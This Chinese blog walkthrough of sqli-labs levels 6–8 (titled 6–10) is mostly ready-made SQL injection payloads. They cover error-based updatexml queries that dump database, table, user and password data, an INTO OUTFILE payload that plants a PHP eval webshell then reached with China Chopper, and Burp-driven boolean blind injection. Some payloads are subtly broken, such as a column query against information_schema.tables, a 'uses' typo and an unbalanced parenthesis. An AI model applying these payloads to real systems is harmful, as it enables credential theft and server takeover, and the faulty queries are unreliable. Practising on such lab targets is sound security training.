首页 > 数据库 >sqli-labs靶场通关攻略(6-10关)

sqli-labs靶场通关攻略(6-10关)

时间:2024-08-17 22:54:09浏览次数:9  
标签:10 127.0 Less 0.1 labs sqli --+ id select

第六关(闭合方式为 "  ,报错注入)

同样先判断闭合方式,此关为 " 闭合

这关呢我们使用报错注入

接下来我们用抓包工具来测他的字段列数

打开抓包工具Burp Suite并开启抓包

order by 1 来判断,回车后我们打开工具页面,在抓包工具里进行操作

好,这里我们已经抓到包了,然后把他发送到攻击器里面

选中http://127.0.0.1/Less-6/?id=1%22%20order%20by%201%20--+ 中的1

添加之后设置参数,然后开始攻击

暴力破解后得到长度为三(点击length,会自动筛选,看到有三条数据和其他的差异很大)

我们下来我们查询数据库名 

127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select database())),1) --+

这里我们查到数据库名为 security,那么我们接下来查表名

127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) --+

接下来我们查列名

127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.tables where table_schema='security' and table_name='users')),1) --+

接下来我们查具体的 username 和 password 

127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select group_concat(username,password)from users)),1) --+

这里显示不全,我们也可以用 limit 一条一条查询

这里是第一条的username

127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select username from users limit 0,1)),1) --+

第二条username

127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select username from users limit 1,1)),1) --+

第三条username

127.0.0.1/Less-6/?id=1" and updatexml(1,(concat(1,(select username from users limit 2,1)),1) --+

password同理查询

第一条

127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select password from users limit 0,1)),1) --+

第二条

127.0.0.1/Less-6/?id=1" and updatexml(1,concat(1,(select password from uses limit 1,1)),1) --+

第七关(闭合方式为 ')) ,外带注入)

输入1d=1后提示我们用outfile

这里我们进入dos命令页面查询一下secure-file-priv的当前值是否为空,

 查询:show variables like '%secure%';

我们可以打开根目录返回到www同级别目录下的

\phpstudy_pro\Extensions 然后打开这个my.ini文件

在这里插入这条语句    secure_file_priv = ''

然后保存,重启数据库

接下来我们用union联合查询注入参数,用 into outfile 给他注入一个一句话木马文件

127.0.0.1/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "D:\\phpstudy_pro\\WWW\\1.php"--+

接下来我们访问一下这个目录看php木马文件是否上传成功 ,如果可以访问到就说明上传成功

接下来我们使用菜刀进行连接

地址就输入可以访问到木马文件的地址就行 第二个框则是输入php语句中的括号里的内容(这里为了方便大家看到小编用红色字体标出来了哦)'<?php @eval($_POST[cmd]);?>

然后我们就可以进去进行其他操作了,也可以打开终端在其计算机上进行dos命令

第八关(闭合方式为  '  ,布尔盲注)

 此关我们需要用到布尔盲注以及抓包工具

首先判断数据库名称的长度

127.0.0.1/Less-8/?id=1' and length(database())=1 --+

并抓包发送到攻击器并设置参数(这里就不细说了,详细的可以往上翻看第六关,那里有非常详细的抓包教学)

设置好之后开始攻击,并得到长度为八

接下来我们开始判断数据库的名称,这里要用到集束炸弹(一次设置多个变量)

127.0.0.1/Less-8/?id=1' and ascii(substr(database(),1,1))=100 --+

这里需要把攻击方式换成多个如下图

1的参数

2的参数

攻击完成得到一下ascii码我们根据ascii码表查询其数值所代表的字符(温馨提示:这里要注意字符的顺序哦,payload 1 里面的数字是数据库名称的字符顺序 -3为名称的第三个字符,其他同理)我们可以得到数据库名为security

接下来我们开始查security数据库中第一个表名

127.0.0.1/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=100 --+

这里不知道他的名字为几位所以就先设置1-10

开始攻击后得到结果,第一个表名为emails

第二表名,直接返回攻击器界面,修改一个数字,其他不用变,接着攻击

得到第二个表名 referers

接着依次类推,同样那个框起来的位置换成2,3,4(下图灰色方框的)

得到所有表名之后我们开始查询users表中的数据

127.0.0.1/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=100 --+

接下来同样是抓包,还是设置同样的参数 ,得到第一个字段为id,第二个为username,第三个为password

接下来查询username和·password·

查username

127.0.0.1/Less-8/?id=1' and ascii(substr((select username from users limit 0,1),1,1))=100 --+

查password

127.0.0.1/Less-8/?id=1' and ascii(substr((select password from users limit 0,1),1,1))=100 --+

后面也都是同上的步骤,改参数

然后攻击这里得到username第一个为Dumb

第一个password为Dumb

标签:10,127.0,Less,0.1,labs,sqli,--+,id,select
From: https://blog.csdn.net/Nai_zui_jiang/article/details/141254905

相关文章

  • P10886 【MX-S3-T2】「FeOI Round 1」Journey 题解
    我们肯定是要先求出来一个位置被加的次数,然后和权值乘一下就行。对于一个位置\(i\),右端点\(b\)肯定是随便选,一共\(n-i+1\)种情况。再是对于每一种步长\(c\),左端点\(a\)都有\(\left\lceil\dfrac{i}{c}\right\rceil\)种取值,暴力计算,时间复杂度\(O(n^2)\)。(提交记录)考虑......
  • 基于ssm框架的博客系统(10797)
     有需要的同学,源代码和配套文档领取,加文章最下方的名片哦一、项目演示项目演示视频二、资料介绍完整源代码(前后端源代码+SQL脚本)配套文档(LW+PPT+开题报告)远程调试控屏包运行三、技术介绍Java语言SSM框架SpringBoot框架Vue框架JSP页面Mysql数据库IDEA/Eclipse开发四、项......
  • 教材管理系统(10794)
     有需要的同学,源代码和配套文档领取,加文章最下方的名片哦一、项目演示项目演示视频二、资料介绍完整源代码(前后端源代码+SQL脚本)配套文档(LW+PPT+开题报告)远程调试控屏包运行三、技术介绍Java语言SSM框架SpringBoot框架Vue框架JSP页面Mysql数据库IDEA/Eclipse开发四、项......
  • P1045 [NOIP2003 普及组] 麦森数极简解法解读
    源代码如下(这个精妙绝伦的算法不是我发现的,而是取自原题解中的某个大佬,在经过一顿学习正常题解后看到,顿觉豁然开朗,原贴:https://www.luogu.com.cn/article/c3u874kg)includeincludeincludeusingnamespacestd;longlonga[501]={1};intmain(){intp;cin>>p;cout<<(......
  • 雷达气象学(10)——双偏振雷达及其变量
    目录10.1双偏振雷达的优势10.2双偏振变量——反映降水粒子特性的变量10.3差分反射率\(Z_{DR}\)10.3.1差分反射率的定义10.3.2雨滴的差分反射率10.3.3冰、雪和冰雹的差分反射率10.3.4层云降水的差分反射率10.3.5对流降水的差分反射率10.4相关系数\(\rho_{hv}\)10.5比差......
  • P10888 【MX-S3-T4】「FeOI Round 1」醒餞の鳥 (feat. Feryquitous) 题解
    话说这题真的有紫吗(问号注意到数据范围中提到$\sum{nm}\le2\times10^5$,这里实际上是隐含了\(\min(n,m)\le\sqrt{2\times10^5}\)的。我们考虑根据\(n\)和\(m\)的大小关系设计出不同的算法。\(m<n\)一个比较直接的想法是对于每一个科目先按该科目的分数排序,这样......
  • MNN框架在WIN10上的部署
    一、为什么要做刚进公司,实习期反正主管要求什么我就做什么。。。。自己反正也比较感兴趣,故开始查看官方文档。下述的一切都是基于官方提供的“语雀文档”内的指令进行的,会对自己部署MNN框架的流程当中踩的坑进行记录,希望可以帮助到有缘人。二、具体内容1、在各个应用端部署MNN......
  • 010、Vue3+TypeScript基础,通过toRefs和toRef把对象的属性变成响应式引用
    1、App.vue代码如下:<template><divclass="app"><h1>好好学习,天天向上</h1><Person/></div></template><script>//JS或TSimportPersonfrom'./view/Person.vue'exportdefault{//A......
  • 【漫谈C语言和嵌入式007】AD2S1210简介与应用:高精度旋转变压器到数字转换器的解析
            在精密运动控制和测量系统中,旋转变压器(Resolver)是一种常用的传感器,能够精确检测旋转轴的位置和速度。为了将旋转变压器的模拟信号转换为数字信号,便于微控制器或DSP进行处理,AD2S1210作为一款高性能的旋转变压器到数字转换器(RDC),为工程师提供了高精度、低延迟的......
  • P10703 [SNCPC2024] 窗花
    [SNCPC2024]窗花题目描述有一扇\(100\text{cm}\times100\text{cm}\)的窗户和\(n\)个对角线长为\(2\text{cm}\)的正方形窗花。建立坐标系,以窗户左下角的坐标为原点\((0,0)\),右上角坐标为\((100,100)\),第\(i\)个窗花中心被贴在非边缘的整坐标点\((x_i,y_i)\)(\(......